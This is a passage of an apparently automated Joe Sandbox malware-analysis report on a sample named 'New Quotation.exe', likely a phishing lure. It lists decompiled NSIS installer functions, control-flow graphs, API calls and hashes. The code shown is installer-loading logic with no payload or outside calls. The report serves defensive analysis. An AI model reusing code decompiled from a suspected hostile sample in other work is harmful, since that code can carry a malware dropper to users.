                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$3073$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                          • API String ID: 1975747703-1729613118
                                                                                                                                                                                          • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                          • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                          • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 434 40328b-4032a6 SetFilePointer call 405fe8 431->434 432->412 433 403174-40317b 432->433 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\New Quotation.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\New Quotation.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040653D(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040653D(0x444000, E00405E58(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x2e2fc
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}





























                                                                                                                                                                                          0x00403085
                                                                                                                                                                                          0x00403088
                                                                                                                                                                                          0x0040308b
                                                                                                                                                                                          0x0040308e
                                                                                                                                                                                          0x00403094
                                                                                                                                                                                          0x004030a5
                                                                                                                                                                                          0x004030aa
                                                                                                                                                                                          0x004030bd
                                                                                                                                                                                          0x004030c2
                                                                                                                                                                                          0x004030c5
                                                                                                                                                                                          0x004030cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004030cd
                                                                                                                                                                                          0x004030d8
                                                                                                                                                                                          0x004030de
                                                                                                                                                                                          0x004030ef
                                                                                                                                                                                          0x004030f6
                                                                                                                                                                                          0x004030fe
                                                                                                                                                                                          0x00403103
                                                                                                                                                                                          0x00403105
                                                                                                                                                                                          0x004031f0
                                                                                                                                                                                          0x004031f2
                                                                                                                                                                                          0x004031fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403203
                                                                                                                                                                                          0x00403227
                                                                                                                                                                                          0x00403227
                                                                                                                                                                                          0x0040322c
                                                                                                                                                                                          0x00403232
                                                                                                                                                                                          0x0040323d
                                                                                                                                                                                          0x00403242
                                                                                                                                                                                          0x00403242
                                                                                                                                                                                          0x00403245
                                                                                                                                                                                          0x00403246
                                                                                                                                                                                          0x00403247
                                                                                                                                                                                          0x00403249
                                                                                                                                                                                          0x00403251
                                                                                                                                                                                          0x00403268
                                                                                                                                                                                          0x00403270
                                                                                                                                                                                          0x00403275
                                                                                                                                                                                          0x00403277
                                                                                                                                                                                          0x00403277
                                                                                                                                                                                          0x0040327f
                                                                                                                                                                                          0x0040327f
                                                                                                                                                                                          0x00403282
                                                                                                                                                                                          0x00403283
                                                                                                                                                                                          0x00403283
                                                                                                                                                                                          0x00403286
                                                                                                                                                                                          0x00403288
                                                                                                                                                                                          0x00403288
                                                                                                                                                                                          0x00403292
                                                                                                                                                                                          0x00403298
                                                                                                                                                                                          0x004032a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004032ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403251
                                                                                                                                                                                          0x0040320b
                                                                                                                                                                                          0x0040321d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040310b
                                                                                                                                                                                          0x00403110
                                                                                                                                                                                          0x00403115
                                                                                                                                                                                          0x00403119
                                                                                                                                                                                          0x00403120
                                                                                                                                                                                          0x00403127
                                                                                                                                                                                          0x00403129
                                                                                                                                                                                          0x00403129
                                                                                                                                                                                          0x00403134
                                                                                                                                                                                          0x0040325c
                                                                                                                                                                                          0x00403253
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403253
                                                                                                                                                                                          0x00403141
                                                                                                                                                                                          0x004031c1
                                                                                                                                                                                          0x004031c5
                                                                                                                                                                                          0x004031ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004031c1
                                                                                                                                                                                          0x0040314a
                                                                                                                                                                                          0x0040314f
                                                                                                                                                                                          0x00403157
                                                                                                                                                                                          0x0040317d
                                                                                                                                                                                          0x00403183
                                                                                                                                                                                          0x0040318c
                                                                                                                                                                                          0x00403192
                                                                                                                                                                                          0x00403197
                                                                                                                                                                                          0x0040319d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004031a7
                                                                                                                                                                                          0x004031af
                                                                                                                                                                                          0x004031b2
                                                                                                                                                                                          0x004031b7
                                                                                                                                                                                          0x004031b9
                                                                                                                                                                                          0x004031b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004031a7
                                                                                                                                                                                          0x004031cb
                                                                                                                                                                                          0x004031d1
                                                                                                                                                                                          0x004031dd
                                                                                                                                                                                          0x004031dd
                                                                                                                                                                                          0x004031e0
                                                                                                                                                                                          0x004031e6
                                                                                                                                                                                          0x004031e6
                                                                                                                                                                                          0x004031ee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004031ee

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\New Quotation.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                            • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                            • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Quotation.exe,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New Quotation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                          • API String ID: 2803837635-937078838
                                                                                                                                                                                          • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                          • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                          • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 744 4034c8-4034cc 739->744 742 4034aa-4034ad 740->742 743 40346c-40346f 740->743 745 4034c5 741->745 746 403367-40336f 741->746 747 4034b2-4034bb call 4034cf 742->747 748 4034af 742->748 743->745 749 403471 743->749 745->744 750 403371 746->750 751 403374-403382 call 4034cf 746->751 747->737 759 4034c2 747->759 748->747 753 403474-40347a 749->753 750->751 751->737 761 403388-403391 751->761 756 40347c 753->756 757 40347e-40348c call 4034cf 753->757 756->757 757->737 765 40348e-40349a call 4060df 757->765 759->745 763 403397-4033b7 call 406a65 761->763 768 403460-403462 763->768 769 4033bd-4033d0 GetTickCount 763->769 771 403464-403466 765->771 772 40349c-4034a6 765->772 768->739 773 4033d2-4033da 769->773 774 40341b-40341d 769->774 771->739 772->753 775 4034a8 772->775 776 4033e2-403413 MulDiv wsprintfW call 40559f 773->776 777 4033dc-4033e0 773->777 778 403454-403458 774->778 779 40341f-403423 774->779 775->745 784 403418 776->784 777->774 777->776 778->746 780 40345e 778->780 782 403425-40342c call 4060df 779->782 783 40343a-403445 779->783 780->745 788 403431-403433 782->788 786 403448-40344c 783->786 784->774 786->763 787 403452 786->787 787->745 788->771 789 403435-403438 788->789 789->786
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                                                                                                                                                          0x004032bf
                                                                                                                                                                                          0x004032c3
                                                                                                                                                                                          0x004032c6
                                                                                                                                                                                          0x004032cb
                                                                                                                                                                                          0x004032cd
                                                                                                                                                                                          0x004032cd
                                                                                                                                                                                          0x004032d4
                                                                                                                                                                                          0x004032d8
                                                                                                                                                                                          0x004032dd
                                                                                                                                                                                          0x004032df
                                                                                                                                                                                          0x004032df
                                                                                                                                                                                          0x004032e6
                                                                                                                                                                                          0x004032eb
                                                                                                                                                                                          0x004032f6
                                                                                                                                                                                          0x004032f6
                                                                                                                                                                                          0x00403308
                                                                                                                                                                                          0x004034bd
                                                                                                                                                                                          0x004034bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040330e
                                                                                                                                                                                          0x00403312
                                                                                                                                                                                          0x0040346a
                                                                                                                                                                                          0x004034ad
                                                                                                                                                                                          0x004034af
                                                                                                                                                                                          0x004034af
                                                                                                                                                                                          0x004034bb
                                                                                                                                                                                          0x004034c2
                                                                                                                                                                                          0x004034c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004034bb
                                                                                                                                                                                          0x0040346f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403471
                                                                                                                                                                                          0x00403474
                                                                                                                                                                                          0x00403477
                                                                                                                                                                                          0x0040347a
                                                                                                                                                                                          0x0040347c
                                                                                                                                                                                          0x0040347c
                                                                                                                                                                                          0x0040348c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040349a
                                                                                                                                                                                          0x00403464
                                                                                                                                                                                          0x00403464
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x0040349c
                                                                                                                                                                                          0x0040349f
                                                                                                                                                                                          0x004034a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004034a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403474
                                                                                                                                                                                          0x0040331e
                                                                                                                                                                                          0x00403320
                                                                                                                                                                                          0x00403327
                                                                                                                                                                                          0x0040332e
                                                                                                                                                                                          0x0040332e
                                                                                                                                                                                          0x00403335
                                                                                                                                                                                          0x0040333d
                                                                                                                                                                                          0x00403347
                                                                                                                                                                                          0x0040334c
                                                                                                                                                                                          0x00403354
                                                                                                                                                                                          0x0040335e
                                                                                                                                                                                          0x00403361
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403367
                                                                                                                                                                                          0x00403367
                                                                                                                                                                                          0x00403367
                                                                                                                                                                                          0x0040336f
                                                                                                                                                                                          0x00403371
                                                                                                                                                                                          0x00403371
                                                                                                                                                                                          0x00403382
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403388
                                                                                                                                                                                          0x0040338b
                                                                                                                                                                                          0x00403391
                                                                                                                                                                                          0x00403397
                                                                                                                                                                                          0x00403397
                                                                                                                                                                                          0x004033a2
                                                                                                                                                                                          0x004033a8
                                                                                                                                                                                          0x004033ad
                                                                                                                                                                                          0x004033b4
                                                                                                                                                                                          0x004033b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004033bd
                                                                                                                                                                                          0x004033c3
                                                                                                                                                                                          0x004033c5
                                                                                                                                                                                          0x004033ce
                                                                                                                                                                                          0x004033d0
                                                                                                                                                                                          0x00403401
                                                                                                                                                                                          0x00403407
                                                                                                                                                                                          0x00403413
                                                                                                                                                                                          0x00403418
                                                                                                                                                                                          0x00403418
                                                                                                                                                                                          0x0040341d
                                                                                                                                                                                          0x00403458
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040341f
                                                                                                                                                                                          0x00403423
                                                                                                                                                                                          0x0040343a
                                                                                                                                                                                          0x0040343f
                                                                                                                                                                                          0x00403442
                                                                                                                                                                                          0x00403445
                                                                                                                                                                                          0x00403448
                                                                                                                                                                                          0x0040344c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403452
                                                                                                                                                                                          0x0040342c
                                                                                                                                                                                          0x00403433
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403435
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403435
                                                                                                                                                                                          0x0040341d
                                                                                                                                                                                          0x00403460
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403460
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403367

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                          • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                                                                                          • API String ID: 551687249-3683892814
                                                                                                                                                                                          • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                          • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 802 4017b5-4017b6 call 4067c4 795->802 796->802 805 4017bb-4017bf 802->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 809 4017f7-4017f8 call 406008 807->809 810 4017fd-401819 call 40602d 807->810 809->810 817 40181b-40181e 810->817 818 40188d-4018b6 call 40559f call 4032b4 810->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 854 401864-401865 819->854 830 401882-401888 820->830 834 402c33 830->834 832->833 836 4018d0-4018db CloseHandle 832->836 833->836 840 402c35-402c39 834->840 838 4018e1-4018e4 836->838 839 402c2a-402c2d 836->839 842 4018e6-4018f7 call 40657a lstrcatW 838->842 843 4018f9-4018fc call 40657a 838->843 839->834 848 401901-402398 842->848 843->848 852 40239d-4023a2 848->852 853 402398 call 405b9d 848->853 852->840 853->852 854->830 855 401867-401868 854->855 855->820
                                                                                                                                                                                          C-Code - Quality: 75%
